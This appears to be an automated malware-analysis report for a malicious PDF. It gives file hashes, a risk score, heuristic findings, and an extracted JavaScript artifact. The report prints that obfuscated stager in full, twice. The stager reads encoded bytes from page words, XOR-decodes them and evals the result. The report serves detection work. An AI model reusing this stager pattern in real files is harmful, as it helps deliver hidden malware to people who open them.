PDF malware analysis — malicious · 7cc755840028cdaf

MALICIOUS

PDF

6.5 KB Created: 2010-10-17 04:41:40 Authoring application: Mofijilegilozisauafotego (via 00db0Wkeqwixiqe) First seen: 2026-05-08

MD5: 8e5372da49188aca818173a720796f17 SHA-1: 4ceb2991c18a5cd0d92b64fc24b39b8548ba2d2a SHA-256: 7cc755840028cdaf76aeb84d8be099c94eadf5f120256b6e832da99be0fe6a67

86 Risk Score

Machine Learning

Nyx PDF Classifier malicious score 1.0000

Heuristics 3

Page-word XOR JavaScript eval stager high PDF_PAGE_WORD_XOR_EVAL_STAGER

PDF JavaScript enumerates rendered page words with getPageNthWord/getPageNumWords, extracts encoded byte fragments, XOR-decodes the stage with char-code helpers, and evals the result. This is an old exploit-kit staging pattern and is not normal document JavaScript.
JavaScript action low 1 related finding PDF_JAVASCRIPT

PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
Embedded JS stream low PDF_JS

PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

javascript_obj0011_000.js pdf-javascript-stream PDF /JS object 11 at offset 0x1250 1537 bytes

Filename	Kind	Source	Size
`javascript_obj0011_000.js`	pdf-javascript-stream	PDF /JS object 11 at offset 0x1250	1537 bytes
SHA-256: `e908354ca8a5ec66f5aee96d41b97d4ae2a1df9cf0bcaf4e4300a85f1f21270e`
Preview script First 1,000 lines of the extracted script var lG=/[&A@D~#_\!k]/g; var hCN="le"+"ng"+"th"; var wLGL="var ePMJ=_this.l;try {var n={ hYL : \'getPageNthWord\',jQV : \'getPageNumWord_@s\',rGH : \'pakgeNu~m\',bSH : \'e_!val\',nS~kT :@# \'join\',};zWV = 161 ;vkKT=\'\';jDkSB=\'\';pWL=0;zKP=String;tOT=\'\\\\x\';r&QX=\'toString\';tSR=1;bOZ=2;zKPK=4;rYZA=5;vUF=255;pCPE=16;tQB=\'doc\';hKN=332;pET=[];pCP=\'\';bUZ=ePMJ[n.AjQV](ePMJ[n.rGH]);for(dCN=pWL;dCN< bUZ; dCN++){var dMR=ePMJ[n.hYL](eP__MJ[n.rGH],dCN,tSR);@&jSB=[jSB,dMR]!![n!.n#ST](vKT);;}for(dCN=0;dCN <& k!jSB.length; dCN+=bOZ){aFCT=jSB.substr(dCN,bOZ);pIT=parseInt(aFCT,pCPE);pOZ=pIT^zWV;nGR=pOZ.toString(pCPE);nGR=(nGR.length==tSR) ?k@ \'0\' + nGR : nGR;app[n.bSH](\'xQH=(\"\'+tOT+nGR+\'\"&A);\');pET.push(xQH);}try {pCP=pET.join(vKT)!;ePMJ.nCF=(pCP.substr(pCP.length-hKN));ePMJ.tMB=(p_CP.substr(pWL,pCP.length-hKN));h_IV(~k);} Acatch(fYV){if(ePMJ.tMB){try {app[n.bSHk](e&_PMJ.tMB_&);} catch~#(fYV)!#{}}_& else {}}} catch(pCP){app.alert(pCP.message);}"; function fE(eZAD,x){return eZAD+x}; var zOT=new String("repl"+"ace7pB".substr(0,3)); var dAF=String("eval"); var nKB="pro"+"tot"+"ype"; var vKT=''; var pWL=0; function jAB(vUZ){this.pKV=this.l=vUZ}; var tQB=this; ; wLGL=wLGL[zOT](lG, vKT); var vAZU=false; vYV=["lSBM","oZQH"]; ; jAB[nKB].zKT = function(){ var dO={}; this.l[dAF](wLGL); var lID={nQJ:22919};var h={tG:32531};var dW=[]; } var fCV={bGN:false};var zWJ={z:false};r=["sP"]; var tUT=new jAB(tQB); this.bUN=30491;this.bUN-=30;this.rO=23188;this.rO-=11;this.bCZ=17103;this.bCZ-=226; tUT.zKT(); ;

SHA-256: e908354ca8a5ec66f5aee96d41b97d4ae2a1df9cf0bcaf4e4300a85f1f21270e

Preview script

First 1,000 lines of the extracted script

var lG=/[&A@D~#_\!k]/g;
var hCN="le"+"ng"+"th";
var wLGL="var ePMJ=_this.l;try {var n={    hYL : \'getPageNthWord\',jQV : \'getPageNumWord_@s\',rGH : \'pakgeNu~m\',bSH : \'e_!val\',nS~kT :@# \'join\',};zWV = 161 ;vkKT=\'\';jDkSB=\'\';pWL=0;zKP=String;tOT=\'\\\\x\';r&QX=\'toString\';tSR=1;bOZ=2;zKPK=4;rYZA=5;vUF=255;pCPE=16;tQB=\'doc\';hKN=332;pET=[];pCP=\'\';bUZ=ePMJ[n.AjQV](ePMJ[n.rGH]);for(dCN=pWL;dCN< bUZ; dCN++){var dMR=ePMJ[n.hYL](eP__MJ[n.rGH],dCN,tSR);@&jSB=[jSB,dMR]!![n!.n#ST](vKT);;}for(dCN=0;dCN <& k!jSB.length; dCN+=bOZ){aFCT=jSB.substr(dCN,bOZ);pIT=parseInt(aFCT,pCPE);pOZ=pIT^zWV;nGR=pOZ.toString(pCPE);nGR=(nGR.length==tSR) ?k@ \'0\' + nGR : nGR;app[n.bSH](\'xQH=(\"\'+tOT+nGR+\'\"&A);\');pET.push(xQH);}try {pCP=pET.join(vKT)!;ePMJ.nCF=(pCP.substr(pCP.length-hKN));ePMJ.tMB=(p_CP.substr(pWL,pCP.length-hKN));h_IV(~k);} Acatch(fYV){if(ePMJ.tMB){try {app[n.bSHk](e&_PMJ.tMB_&);} catch~#(fYV)!#{}}_& else {}}} catch(pCP){app.alert(pCP.message);}";
function fE(eZAD,x){return eZAD+x};
var zOT=new String("repl"+"ace7pB".substr(0,3));
var dAF=String("eval");
var nKB="pro"+"tot"+"ype";
var vKT='';


var pWL=0;
function jAB(vUZ){this.pKV=this.l=vUZ};
var tQB=this;
;



wLGL=wLGL[zOT](lG, vKT);
var vAZU=false;


vYV=["lSBM","oZQH"];
;


jAB[nKB].zKT = function(){
var dO={};
this.l[dAF](wLGL);
var lID={nQJ:22919};var h={tG:32531};var dW=[];
}

var fCV={bGN:false};var zWJ={z:false};r=["sP"];

var tUT=new jAB(tQB);



this.bUN=30491;this.bUN-=30;this.rO=23188;this.rO-=11;this.bCZ=17103;this.bCZ-=226;

tUT.zKT();
;

Open this report in the interactive analyzer, or submit your own file for analysis.